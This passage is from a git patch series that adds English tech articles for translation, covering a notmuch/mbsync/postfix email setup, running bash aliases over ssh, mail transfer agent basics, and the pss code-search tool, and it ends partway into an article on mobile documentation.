ever Redpill network-of-networks redpill.dk, involving my own network (jones.dk), my main client's network (homebase.dk), a network in Germany including Skolelinux Germany (free-owl.de), and Vasudev's network (copyninja.info) + +Along with that I have a dovecot sieve filtering to classify on high level mails into various folders depending on from where they originate. All the rules live in the ~/dovecot.sieve file under every account which has a mail address. + +Again I'm not going into detail of how to set these things up, as its not goal of my this post. + +### On my Laptop + +On my laptop I've following 4 parts setup + + 1. Mail syncing : Done using mbsync command + 2. Classification: Done using notmuch + 3. Reading: Done using notmuch-emacs + 4. Mail sending: Done using postfix running as relay server and SMTP client. + + + +### Mail Syncing + +Mail syncing is done using mbsync tool, I was previously user of offlineimap and recently switched to mbsync as I felt it more lighter and simpler to configure than offlineimap. mbsync command is provided by package isync. + +Configuration file is ~/.mbsyncrc. Below is my sample content with some private things redacted. + +``` +IMAPAccount copyninja +Host imap.copyninja.info +User vasudev +PassCmd "gpg -q --for-your-eyes-only --no-tty --exit-on-status-write-error --batch --passphrase-file ~/path/to/passphrase.txt -d ~/path/to/mailpass.gpg" +SSLType IMAPS +SSLVersion TLSv1.2 +CertificateFile /etc/ssl/certs/ca-certificates.crt + + +IMAPAccount gmail-kamathvasudev +Host imap.gmail.com +User kamathvasudev@gmail.com +PassCmd "gpg -q --for-your-eyes-only --no-tty --exit-on-status-write-error --batch --passphrase-file ~/path/to/passphrase.txt -d ~/path/to/mailpass.gpg" +SSLType IMAPS +SSLVersion TLSv1.2 +CertificateFile /etc/ssl/certs/ca-certificates.crt + +IMAPStore copyninja-remote +Account copyninja + +IMAPStore gmail-kamathvasudev-remote +Account gmail-kamathvasudev + +MaildirStore copyninja-local +Path ~/Mail/vasudev-copyninja.info/ +Inbox ~/Mail/vasudev-copyninja.info/INBOX + +MaildirStore gmail-kamathvasudev-local +Path ~/Mail/Gmail-1/ +Inbox ~/Mail/Gmail-1/INBOX + +Channel copyninja +Master :copyninja-remote: +Slave :copyninja-local: +Patterns * +Create Both +SyncState * +Sync All + +Channel gmail-kamathvasudev +Master :gmail-kamathvasudev-remote: +Slave :gmail-kamathvasudev-local: +# Exclude everything under the internal [Gmail] folder, except the interesting folders +Patterns * ![Gmail]* +Create Both +SyncState * +Sync All +``` + +Explanation for some interesting part in above configuration. One is the PassCmd which allows you to provide shell command to obtain the password for the account. This avoids filling in the password in configuration file. I'm using symmetric encryption with gpg and storing password some where on my disk. Which is of course just safe guarded by Unix ACL. + +I actually wanted to use my public key to encrypt the file but unlocking the file when script is run in background or via systemd looks difficult (or looked nearly impossible). If you have better suggestion I'm all ears :-). + +Next instruction part is Patterns. This allows you to selectively sync mail from your mail server. This was really helpful for me to exclude all crappy [Gmail]/ folders. + +### Mail Classification + +Once mail is locally on your device, we need a way to read the mails easily in a mail reader. My original setup was serving synced Maildir using local dovecot instance and read it in Gnus. This setup was bit of a over kill with all server software setups but inability of Gnus to not cope well with Maildir format this was best way to do it. This setup also has a disadvantage, that is searching a mail quickly when you have huge pile of mail to go through. This is where notmuch comes into picture. + +notmuch allows me to easily index through Gigabytes of my mail archives and get what I need very easily. I've created a small script which combines executing of mbsync and notmuch execution. I tag mails based on the Maildirs which are actually created on server side using dovecot sieve. Below is my full shell script which is doing task of syncing classification and deleting of spams. + +``` +#!/bin/sh + +MBSYNC=$(pgrep mbsync) +NOTMUCH=$(pgrep notmuch) + +if [ -n "$MBSYNC" -o -n "$NOTMUCH" ]; then + echo "Already running one instance of mail-sync. Exiting..." + exit 0 +fi + +echo "Deleting messages tagged as *deleted*" +notmuch search --format=text0 --output=files tag:deleted |xargs -0 --no-run-if-empty rm -v + +echo "Moving spam to Spam folder" +notmuch search --format=text0 --output=files tag:Spam and \ + to:vasudev@copyninja.info | \ + xargs -0 -I {} --no-run-if-empty mv -v {} ~/Mail/vasudev-copyninja.info/Spam/cur +notmuch search --format=text0 --output=files tag:Spam and + to:vasudev-debian@copyninja.info | \ + xargs -0 -I {} --no-run-if-empty mv -v {} ~/Mail/vasudev-copyninja.info/Spam/cur + + +MDIR="vasudev-copyninja.info vasudev-debian Gmail-1" +mbsync -Va +notmuch new + +for mdir in $MDIR; do + echo "Processing $mdir" + for fdir in $(ls -d /home/vasudev/Mail/$mdir/*); do + if [ $(basename $fdir) != "INBOX" ]; then + echo "Tagging for $(basename $fdir)" + notmuch tag +$(basename $fdir) -inbox -- folder:$mdir/$(basename $fdir) + fi + done +done +``` + +So before running mbsync I search for all mails tagged as deleted and delete them from system. Next I look for mails tagged as Spam on both my accounts and move it to Spam folder. Yeah you got it right these are mails escaping the spam filter and landing in my inbox and personally marked as Spam. + +After running mbsync I tag mails based on their folder (searching string folder:). This allows me easily get contents of lets say a mailing list without remembering the list address. + +### Reading Mails + +Now that we have synced and classified mail its time to setup the reading part. I use notmuch-emacs interface to read the mails. I use Spacemacs flavor of emacs so I took some time to write down the a private layer which brings together all my keybindings and classification in one place and does not clutter my entire .spacemacs file. You can find the code for my private layer in [notmuch-emacs-layer repository][1] + +### Sending Mails + +Well its not sufficient that if we can read mails, we need to be able to reply to mail. And this was the slightly tricky part where I recently got lost and had to write this post so that I don't forget it again. (And of course don't have to refer some outdated posts on web). + +My setup to send mails is using postfix as SMTP client with my own SMTP server as relayhost for it. The problem of relaying is it's not for the hosts with dynamic IP. There are couple of ways to allow hosts with dynamic IP to use relay servers, one is put the IP address from where mail will originate into my_network or second use SASL authentication. + +My preferred way is use of SASL authentication. For this I first had to create a separate account one for each machine which is going to relay the mails to my main server. Idea is to not use my primary account for SASL authentication. (Originally I was using primary account, but Jonas gave this idea of account per road runner). +``` +adduser _relay + +``` + +Here replace with name of your laptop/desktop or whatever you are using. Now we need to adjust postfix to act as relaying server. So add following lines to postfix configuration +``` +# SASL authentication +smtp_sasl_auth_enable = yes +smtp_tls_security_level = encrypt +smtp_sasl_tls_security_options = noanonymous +relayhost = [smtp.copyninja.info]:submission +smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd +``` + +So here relayhost is the server name which your postfix instance will be using to relay mails forward into internet. :submission part tells postfix to forward mail on to port 587 (secure). smtp_sasl_tls_security_options is set to disallow anonymous connection. This is must so that relay server trusts your mobile host and agrees to forward the mail for you. + +/etc/postfix/sasl_passwd is the file where you need to store password for account to be used for SASL authentication with server. Put following content into it. +``` +[smtp.example.com]:submission user:password + +``` + +Replace smtp.example.com with your SMTP server name which you have put in relayhost configuration. Replace user with _relay user you created and its password. + +To secure the sasl_passwd file and create a hash of it for postfix use following command. +``` +chown root:root /etc/postfix/sasl_passwd +chmod 0600 /etc/postfix/sasl_passwd +postmap /etc/postfix/sasl_passwd +``` + +The last command will create /etc/postfix/sasl_passwd.db file which is hash of your file /etc/postfix/sasl_passwd with same owner and permission. Now reload the postfix and check if mail makes out of your system using mail command. + +### Bonus Part + +Well since I've a script created above bringing together mail syncing and classification. I went ahead and created a systemd timer to periodically sync mails in the background. In my case every 10 minutes. Below is mailsync.timer file. +``` +[Unit] +Description=Check Mail Every 10 minutes +RefuseManualStart=no +RefuseManualStop=no + +[Timer] +Persistent=false +OnBootSec=5min +OnUnitActiveSec=10min +Unit=mailsync.service + +[Install] +WantedBy=default.target +``` + +Below is mailsync.service which is needed by mailsync.timer to execute our scripts. + +``` +[Unit] +Description=Check Mail +RefuseManualStart=no +RefuseManualStop=yes + +[Service] +Type=oneshot +ExecStart=/usr/local/bin/mail-sync +StandardOutput=syslog +StandardError=syslog +``` + +Put these files under /etc/systemd/user and run below command to enable them. +``` +systemctl enable --user mailsync.timer +systemctl enable --user mailsync.service +systemctl start --user mailsync.timer +``` + +So that's how I've sync and send mail from my system. I came to know about afew from Jonas Smedegaard who also proof read this post. So next step I will try to improve my notmuch configuration using afew and of course a post will follow after that :-). + +-------------------------------------------------------------------------------- + +via: https://copyninja.info/blog/email_setup.html + +作者:[copyninja][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://copyninja.info +[1]:https://source.copyninja.info/notmuch-emacs-layer.git/ From 8ba290a8a4a7f4499da52ad923b4ee42eaf899f3 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 18:08:23 +0800 Subject: [PATCH 0819/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20use/?= =?UTF-8?q?run=20bash=20aliases=20over=20ssh=20based=20session?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...run bash aliases over ssh based session.md | 131 ++++++++++++++++++ 1 file changed, 131 insertions(+) create mode 100644 sources/tech/20171226 How to use-run bash aliases over ssh based session.md diff --git a/sources/tech/20171226 How to use-run bash aliases over ssh based session.md b/sources/tech/20171226 How to use-run bash aliases over ssh based session.md new file mode 100644 index 0000000000..af27a605d5 --- /dev/null +++ b/sources/tech/20171226 How to use-run bash aliases over ssh based session.md @@ -0,0 +1,131 @@ +How to use/run bash aliases over ssh based session +====== + +SSH client (ssh) is a Linux/Unix command for logging into a remote server and for executing shell commands on a remote system. It is designed to provide secure encrypted communications between two untrusted machines over an insecure network such as the Internet. + +## How to run or execute commands with Linux ssh client + +I have [set up a bash alias named file_repl][1] . It works entirely when I log in using ssh command. However, my bash aliases are not running over ssh, for example:How do I run bash shell aliases when I use ssh command?SSH client (ssh) is a Linux/Unix command for logging into a remote server and for executing shell commands on a remote system. It is designed to provide secure encrypted communications between two untrusted machines over an insecure network such as the Internet. + +To run a free command or [date command][2] with ssh: +`$ ssh [[email protected]][3] date` +Sample outputs: +``` +Tue Dec 26 09:02:50 UTC 2017 +``` + +OR +`$ ssh [[email protected]][3] free -h` +Sample outputs: +``` +  + total used free shared buff/cache available +Mem: 2.0G 428M 138M 145M 1.4G 1.1G +Swap: 0B 0B 0B +``` + +total used free shared buff/cache available Mem: 2.0G 428M 138M 145M 1.4G 1.1G Swap: 0B 0B 0B + +## Understanding bash shall and command types + +The [bash shell understands][4] the following types of commands: + + 1. Aliases such as ll + 2. Keywords such as if + 3. Functions (user defined functions such as genpasswd) + 4. Built in such as pwd + 5. Files such as /bin/date + + + +The [type command][5] or [command command][6] can be used to find out a command type: +``` +$ type -a date +date is /bin/date +$ type -a free +free is /usr/bin/free +$ command -V pwd +pwd is a shell builtin +$ type -a file_repl +is aliased to `sudo -i /shared/takes/master.replication' +``` +Both date and free are an external commands and file_repl is aliased to sudo -i /shared/takes/master.replication. One can not simply execute aliased command such as file_repl: + +``` +$ ssh user@remote file_repl +``` + +## Bash aliases not running or working over ssh client on Unix based system + +To solve this problem run ssh command as follows: +``` +$ ssh -t [[email protected]][3] /bin/bash -ic 'your-alias-here' +$ ssh -t [[email protected]][3] /bin/bash -ic 'file_repl' +``` +Where ssh command options: + + 1. **-t** :[ Force pseudo-terminal allocation. This can be used to execute arbitrary][7] screen-based programs on a remote machine, which can be very useful. With the -t option you will get an error that read as " bash: cannot set terminal process group (-1): Inappropriate ioctl for device. bash: no job control in this shell. " + + + +Where bash shell options: + + 1. **-i** : Make the shell is interactive so that it can run bash aliases + 2. **-c** : Commands are read from the first non-option argument command_string. If there are arguments after the command_string, they are assigned to the positional parameters, starting with $0. + +In short run the following command to run a bash aliases called ll: +`$ ssh -t [[email protected]][3] -ic 'll'` +Sample session: +[![Running bash aliases over ssh based session when using Unix or Linux ssh cli][8]][8] +Here is my sample shell script: + +``` +#!/bin/bash +I="tags.deleted.410" +O="/tmp/https.www.cyberciti.biz.410.url.conf" +box="vivek@server1.cyberciti.biz" +[ ! -f "$I" ] && { echo "$I file not found."; exit 10; } +>$O +cat "$I" | sort | uniq | while read -r u +do + uu="${u##https://www.cyberciti.biz}" + echo "~^$uu 1;" >>"${O}" +done +echo "Config file created at ${O} and now updating remote nginx config file" +scp "${O}" ${box}:/tmp/ +ssh ${box} /usr/bin/lxc file push /tmp/https.www.cyberciti.biz.410.url.conf nginx-container/etc/nginx/ +ssh -t ${box} /bin/bash -ic 'push_config_job' +``` + +## References + +For more info see [OpenSSH client][9] and [bash man page][10] by typing the following commands: +``` +$ man ssh +$ man bash +$ help type +$ help command +``` + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/faq/use-bash-aliases-ssh-based-session/ + +作者:[Vivek Gite][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://bash.cyberciti.biz/guide/Alias_command#How_to_define_alias +[2]:https://www.cyberciti.biz/faq/unix-date-command-howto-see-set-date-time/ (See Linux/Unix date command examples for more info) +[3]:https://www.cyberciti.biz/cdn-cgi/l/email-protection +[4]:https://bash.cyberciti.biz/guide/Shell_commands +[5]:https://bash.cyberciti.biz/guide/Type_command +[6]:https://bash.cyberciti.biz/guide/Command +[7]:https://www.cyberciti.biz/faq/linux-unix-bsd-sudo-sorry-you-must-haveattytorun/ +[8]:https://www.cyberciti.biz/media/new/faq/2017/12/Bash-shell-aliase-not-found-when-run-over-ssh-on-linux-unix.jpg +[9]:https://man.openbsd.org/ssh +[10]:https://www.gnu.org/software/bash/manual/bash.html From 6bd3c6d424cc433fb1ba8e8ebd1b5b62c92076d4 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 22:28:44 +0800 Subject: [PATCH 0820/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Mail=20transfer?= =?UTF-8?q?=20agent=20(MTA)=20basics?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...171221 Mail transfer agent (MTA) basics.md | 268 ++++++++++++++++++ 1 file changed, 268 insertions(+) create mode 100644 sources/tech/20171221 Mail transfer agent (MTA) basics.md diff --git a/sources/tech/20171221 Mail transfer agent (MTA) basics.md b/sources/tech/20171221 Mail transfer agent (MTA) basics.md new file mode 100644 index 0000000000..94bc55f209 --- /dev/null +++ b/sources/tech/20171221 Mail transfer agent (MTA) basics.md @@ -0,0 +1,268 @@ +Mail transfer agent (MTA) basics +====== + +## Overview + +In this tutorial, learn to: + + * Use the `mail` command. + * Create mail aliases. + * Configure email forwarding. + * Understand common mail transfer agent (MTA) programs such as postfix, sendmail, qmail, and exim. + + + +## Controlling where your mail goes + +Email on a Linux system is delivered using MTAs. Your MTA delivers mail to other users on your system and MTAs communicate with each other to deliver mail all over a group of systems or all over the world. + +### Prerequisites + +To get the most from the tutorials in this series, you need a basic knowledge of Linux and a working Linux system on which you can practice the commands covered in this tutorial. You should be familiar with GNU and UNIX commands. Sometimes different versions of a program format output differently, so your results might not always look exactly like the listings shown here. + +In this tutorial, I use Ubuntu 14.04 LTS and sendmail 8.14.4 for the sendmail examples. + +## Mail transfer + +Mail transfer agents such as sendmail deliver mail between users and between systems. Most Internet mail uses the Simple Mail Transfer Protocol (SMTP), but local mail may be transferred through files or sockets among other possibilities. Mail is a store and forward operation, so mail is stored in some kind of file or database until a user collects it or a receiving system or communication link is available. Configuring and securing an MTA is quite a complex task, most of which is beyond the scope of this introductory tutorial. + +## The mail command + +If you use SMTP email, you probably know that there are many, many mail clients that you can use, including `mail`, `mutt`, `alpine`, `notmuch`, and a host of other console and graphical mail clients. The `mail` command is an old standby that can be used to script the sending of mail as well as receive and manage your incoming mail. + +You can use `mail` interactively to send messages by passing a list of addressees, or with no arguments you can use it to look at your incoming mail. Listing 1 shows how to send a message to user steve and user pat on your system with a carbon copy to user bob. When prompted for the cc:user and the subject, enter the body and complete the message by pressing **Ctrl+D** (hold down the Ctrl key and press D). + +##### Listing 1. Using `mail` interactively to send mail +``` +ian@attic4-u14:~$ mail steve,pat +Cc: bob +Subject: Test message 1 +This is a test message + +Ian +``` + +If all is well, your mail is sent. If there is an error, you will see an error message. For example, if you typed an invalid name as a recipient, the mail is not sent. Note that in this example, all users are on your local system and therefore all must be valid users. + +You can also send mail non-interactively using the command line. Listing 2 shows how to send a small message to users steve and pat. This capability is particularly useful in scripts. Different versions of the `mail` command are available in different packages. Some support a `-c` option for cc:, but the version I am using here does not, so I specify only the to: addresses. + +Listing 2. Using `mail` non-interactively +``` +ian@attic4-u14:~$ mail -t steve,pat -s "Test message 2" <<< "Another test.\n\nIan" +``` + +If you use `mail` with no options you will see a list of your incoming mail as shown in Listing 3. You see that user steve has the two messages I sent above, plus an earlier one from me and a later one from user bob. All the mail is marked as 'N' for new mail. + +Listing 3. Using `mail` for incoming mail +``` +steve@attic4-u14:~$ mail +"/var/mail/steve": 4 messages 4 new +>N 1 Ian Shields Tue Dec 12 21:03 16/704 test message + N 2 Ian Shields Tue Dec 12 21:04 18/701 Test message 1 + N 3 Ian Shields Tue Dec 12 21:23 15/661 Test message 2 + N 4 Bob C Tue Dec 12 21:45 17/653 How about lunch tomorrow? +? +``` + +The currently selected message is shown with a '>', which is message number 1 in Listing 3. If you press **Enter** , the first page of the next unread message will be displayed. Press the **Space bar** to page through the message. When you finish reading the message and return to the '?' prompt, press **Enter** again to view the next message, and so on. At any '?' prompt you can type 'h' to see the list of message headers again. The ones you have read will now show 'R' in the status as shown in Listing 4. + +Listing 4. Using 'h' to display mail headers +``` +? h + R 1 Ian Shields Tue Dec 12 21:03 16/704 test message + R 2 Ian Shields Tue Dec 12 21:04 18/701 Test message 1 +>R 3 Ian Shields Tue Dec 12 21:23 15/661 Test message 2 + N 4 Bob C Tue Dec 12 21:45 17/653 How about lunch tomorrow? +? +``` + +Here Steve has read the three messages from Ian but has not read the message from Bob. You can select individual messages by number, and you can also delete messages that you don't want by typing 'd', or '3d' to delete the third message. If you type 'q' you will quit the `mail` command. Messages that you have read will be transferred to the mbox file in your home directory and the unread messages will remain in your inbox, by default in /var/mail/$(id -un). See Listing 5. + +Listing 5. Using 'q' to quit `mail` +``` +? h + R 1 Ian Shields Tue Dec 12 21:03 16/704 test message + R 2 Ian Shields Tue Dec 12 21:04 18/701 Test message 1 +>R 3 Ian Shields Tue Dec 12 21:23 15/661 Test message 2 + N 4 Bob C Tue Dec 12 21:45 17/653 How about lunch tomorrow? +? q +Saved 3 messages in /home/steve/mbox +Held 1 message in /var/mail/steve +You have mail in /var/mail/steve +``` + +If you type 'x' to exit instead of 'q' to quit, your mailbox will be left unchanged. Because this is on the /var file system, your system administrator may allow mail to be kept there only for a limited time. To reread or otherwise process mail that has been saved to your local mbox file, use the `-f` option to specify the file you want to read. For example `mail -f mbox`. + +## Mail aliases + +In the previous section you saw how mail can be sent to various users on a system. You can use a fully qualified name, such as ian@myexampledomain.com to send mail to a user on another system. + +Sometimes you might want all the mail for a user to go to some other place. For example, you may have a server farm and want all the root mail to go to a central system administrator. Or you may want to create a mailing list where mail goes to several people. To do this, you use aliases that allow you to define one or more destinations for a given user name. The destinations may be other user mail boxes, files, pipes, or commands that do further processing. You do this by specifying the aliases in /etc/mail/aliases or /etc/aliases. Depending on your system, you may find that one of these is a symbolic link to the other, or you may have only one of them. You need root authority to change the aliases file. + +The general form of an alias is +name: addr_1, addr_2, addr_3, ... +where the name is a local user name to alias or an alias and the addr_1, addr_2, ... are one or more aliases. Aliases can be a local user, a local file name, another alias, a command, an include file, or an external address. + +So how does sendmail distinguish the aliases (the addr-N values)? + + * A local user name is a text string that matches the name of a user on this system. Technically this means it can be found using the `getpwnam` call . + * A local file name is a full path and file name that starts with '/'. It must be writeable by `sendmail`. Messages are appended to the file. + * A command starts with the pipe symbol (|). Messages are sent to the command using standard input. + * An include file alias starts with :include: and specifies a path and file name. The aliases in file are added to the aliases for this name. + * An external address is an email address such as john@somewhere.com. + + + +You should find an example file, such as /usr/share/sendmail/examples/db/aliases that was installed with your sendmail package. It contains some recommended aliases for postmaster, MAILER-DAEMON, abuse, and spam. In Listing 6, I have combined entries from the example file on my Ubuntu 14.04 LTS system with some rather artificial examples that illustrate several of the possibilities. + +Listing 6. Somewhat artificial /etc/mail/aliases example + +``` +ian@attic4-u14:~$ cat /etc/mail/aliases +# First include some default system aliases from +# /usr/share/sendmail/examples/db/aliases + +# +# Mail aliases for sendmail +# +# You must run newaliases(1) after making changes to this file. +# + +# Required aliases +postmaster: root +MAILER-DAEMON: postmaster + +# Common aliases +abuse: postmaster +spam: postmaster + +# Other aliases + +# Send steve's mail to bob and pat instead +steve: bob,pat + +# Send pat's mail to a file in her home directory and also to her inbox. +# Finally send it to a command that will make another copy. +pat: /home/pat/accumulated-mail, + \pat, + |/home/pat/makemailcopy.sh + +# Mailing list for system administrators +sysadmins: :include: /etc/aliases-sysadmins +``` + +Note that pat is both an alias and a user of the system. Alias expansion is recursive, so if an alias is also a name, then it will be expanded. Sendmail does not send mail twice to a given user, so if you just put 'pat' as an alias for 'pat', then it would be ignored since sendmail had already found and processed 'pat'. To avoid this problem, you prefix an alias name with a '\' to indicate that it is a name not subject to further aliasing. This way, pat's mail can be sent to her normal inbox as well as the file and command. + +Lines in the aliases that start with '$' are comments and are ignored. Lines that start with blanks are treated as continuation lines. + +The include file /etc/aliases-sysadmins is shown in Listing 7. + +Listing 7. The /etc/aliases-sysadmins include file +``` +ian@attic4-u14:~$ cat /etc/aliases-sysadmins + +# Mailing list for system administrators +bob,pat +``` + +## The newaliases command + +Most configuration files used by sendmail are compiled into database files. This is also true for mail aliases. You use the `newaliases` command to compile your /etc/mail/aliases and any included files to /etc/mail/aliases.db. Note that `newaliases` is equivalent to `sendmail -bi`. Listing 8 shows an example. + +Listing 8. Rebuild the database for the mail aliases file +``` +ian@attic4-u14:~$ sudo newaliases +/etc/mail/aliases: 7 aliases, longest 62 bytes, 184 bytes total +ian@attic4-u14:~$ ls -l /etc/mail/aliases* +lrwxrwxrwx 1 root smmsp 10 Dec 8 15:48 /etc/mail/aliases -> ../aliases +-rw-r----- 1 smmta smmsp 12288 Dec 13 23:18 /etc/mail/aliases.db +``` + +## Examples of using aliases + +Listing 9 shows a simple shell script that is used as a command in my alias example. + +Listing 9. The makemailcopy.sh script +``` +ian@attic4-u14:~$ cat ~pat/makemailcopy.sh +#!/bin/bash + +# Note: Target file ~/mail-copy must be writeable by sendmail! +cat >> ~pat/mail-copy +``` + +Listing 10 shows the files that are updated when you put all this to the test. + +Listing 10. The /etc/aliases-sysadmins include file +``` +ian@attic4-u14:~$ date +Wed Dec 13 22:54:22 EST 2017 +ian@attic4-u14:~$ mail -t sysadmins -s "sysadmin test 1" <<< "Testing mail" +ian@attic4-u14:~$ ls -lrt $(find /var/mail ~pat -type f -mmin -3 2>/dev/null ) +-rw-rw---- 1 pat mail 2046 Dec 13 22:54 /home/pat/mail-copy +-rw------- 1 pat mail 13240 Dec 13 22:54 /var/mail/pat +-rw-rw---- 1 pat mail 9442 Dec 13 22:54 /home/pat/accumulated-mail +-rw-rw---- 1 bob mail 12522 Dec 13 22:54 /var/mail/bob +``` + +Some points to note: + + * There is a user 'mail' with group name 'mail' that is used by sendmail. + * User mail is stored by sendmail in /var/mail which is also the home directory of user 'mail'. The inbox for user 'ian' defaults to /var/mail/ian. + * If you want sendmail to write files in a user directory, the file must be writeable by sendmail. Rather than making it world writeable, it is customary to make it group writeable and make the group 'mail'. You may need a system administrator to do this for you. + + + +## Using a .forward file to forward mail + +The aliases file must be managed by a system administrator. Individual users can enable forwarding of their own mail using a .forward file in their own home directory. You can put anything in your .forward file that is allowed on the right side of the aliases file. The file contains plain text and does not need to be compiled. When mail is destined for you, sendmail checks for a .forward file in your home directory and processes the entries the same way it processes aliases. + +## Mail queues and the mailq command + +Linux mail handling uses a store-and-forward model. You have already seen that your incoming mail is stored in a file in /var/mail until you read it. Outgoing mail is also stored until a receiving server connection is available. You use the `mailq` command to see what mail is queued. Listing 11 shows an example of mail being sent to an external user, ian@attic4-c6, and the result of running the `mailq` command. In this case, there is currently no active link to attic4-c6, so the mail will remain queued until a link becomes active. + +Listing 11. Using the `mailq` command +``` +ian@attic4-u14:~$ mail -t ian@attic4-c6 -s "External mail" <<< "Testing external mail queues" +ian@attic4-u14:~$ mailq +MSP Queue status... +/var/spool/mqueue-client is empty + Total requests: 0 +MTA Queue status... + /var/spool/mqueue (1 request) +-----Q-ID----- --Size-- -----Q-Time----- ------------Sender/Recipient----------- +vBE4mdE7025908* 29 Wed Dec 13 23:48 + + Total requests: 1 +``` + +## Other mail transfer agents + +In response to security issues with sendmail, several other mail transfer agents were developed during the 1990's. Postfix is perhaps the most popular, but qmail and exim are also widely used. + +Postfix started life at IBM research as an alternative to sendmail. It attempts to be fast, easy to administer, and secure. The outside looks somewhat like sendmail, but the inside is completely different. + +Qmail is a secure, reliable, efficient, simple message transfer agent developerd by Dan Bernstein. However, the core qmail package has not been updated for many years. Qmail and several other packages have now been collected into IndiMail. + +Exim is another MTA developed at the University of Cambridge. Originally, the name stood for EXperimental Internet Mailer. + +All of these MTAs were designed as sendmail replacements, so they all have some form of sendmail compatibility. Each can handle aliases and .forward files. Some provide a `sendmail` command as a front end to the particular MTA's own command. Most allow the usual sendmail options, although some options might be ignore silently. The `mailq` command is supported directly or by an alternate command with a similar function. For example, you can use `mailq` or `exim -bp` to display the exim mail queue. Needless to say, output can look different compared to that produced by sendmail's `mailq` command. + +See Related topics where you can find more information on all of these MTAs. + +This concludes your introduction to mail transfer agents on Linux. + + +-------------------------------------------------------------------------------- + +via: https://www.ibm.com/developerworks/library/l-lpic1-108-3/index.html + +作者:[Ian Shields][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ibm.com +[1]:http://www.lpi.org +[2]:https://www.ibm.com/developerworks/library/l-lpic1-map/ From 8dc9c76064dddc4a2329d90e4f91fc49d1552006 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 22:32:26 +0800 Subject: [PATCH 0821/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Improve=20your?= =?UTF-8?q?=20code=20searching=20skills=20with=20pss?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ove your code searching skills with pss.md | 83 +++++++++++++++++++ 1 file changed, 83 insertions(+) create mode 100644 sources/tech/20171222 Improve your code searching skills with pss.md diff --git a/sources/tech/20171222 Improve your code searching skills with pss.md b/sources/tech/20171222 Improve your code searching skills with pss.md new file mode 100644 index 0000000000..d273287f15 --- /dev/null +++ b/sources/tech/20171222 Improve your code searching skills with pss.md @@ -0,0 +1,83 @@ +translating by lujun9972 +Improve your code searching skills with pss +====== +Searching a code base is a part of every day developer activities. From fixing a bug, to learning a new code base or checking how to call an api, being able to quickly navigate your way into a code base is a great skill to have. Luckily, we have dedicated tools to search code. Let's see how to install and use one of them - [**pss**][1]. + +### What is pss? + +**pss** is a command line tool that helps searching inside source code file. **pss** searches recursively within a directory tree, knows which extensions and file names to search and which to ignore, automatically skips directories you wouldn't want to search in (for example `.svn` or `.git`), colors its output in a helpful way, and much more. + +### Installing pss + +Install **pss** on Fedora with the following command: +``` + $ dnf install pss +``` + +Once the installation is complete you can now call **pss** in your terminal +``` + $ pss +``` + +Calling **pss** without any argument or with the -h flag will print a detailed usage message. + +### Usage examples + +Now that you have installed **pss** let 's go through some Usage examples. +``` + $ pss foo +``` + +This command simply looks for `foo`. You can be more restrictive and ask pss to look for `foo` only in python files: +``` + $ pss foo --py +``` + +and for `bar` in all other files: +``` + $ pss bar --nopy +``` + +Additionally, **pss** supports most of the well known source file types, to get the full list execute: +``` +$ pss --help-types +``` + +You can also ignore some directories. Note that by default, **pss** will ignore directories like .git, __pycache__, .metadata and more. +``` +$ pss foo --py --ignore-dir=dist +``` + +Furthermore, **pss** also gives you the possibility to get more context from your search using the following : +``` +$ pss -A 5 foo +``` + +will display 5 line of context after the matching word +``` +$ pss -B 5 foo +``` + +will display 5 line of context before the matching word +``` +$ pss -C 5 foo +``` + +will display 5 line of context before & after the matching word + +If you would like to learn how to use **pss ** with regular expression and other options, more examples are available [here][2]. + + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/improve-code-searching-skills-pss/ + +作者:[Author Archive;Author Website;Clément Verna][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://fedoramagazine.org +[1]:https://github.com/eliben/pss +[2]:https://github.com/eliben/pss/wiki/Usage-samples From ee074838efde04b434fe1c49de7a45420ed45e17 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 22:38:23 +0800 Subject: [PATCH 0822/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20crea?= =?UTF-8?q?te=20mobile-friendly=20documentation?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...to create mobile-friendly documentation.md | 95 +++++++++++++++++++ 1 file changed, 95 insertions(+) create mode 100644 sources/tech/20171221 How to create mobile-friendly documentation.md diff --git a/sources/tech/20171221 How to create mobile-friendly documentation.md b/sources/tech/20171221 How to create mobile-friendly documentation.md new file mode 100644 index 0000000000..96d01f515a --- /dev/null +++ b/sources/tech/20171221 How to create mobile-friendly documentation.md @@ -0,0 +1,95 @@ +How to create mobile-friendly documentation +====== +![配图](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/idea_innovation_mobile_phone.png?itok=RqVtvxkd) +I'm not sold on the whole idea of [mobile first][1], but I do know that more people than ever are using mobile devices like smartphones and tablets to get information on the go. That includes online software and hardware documentation, much of which is lengthy and poorly suited 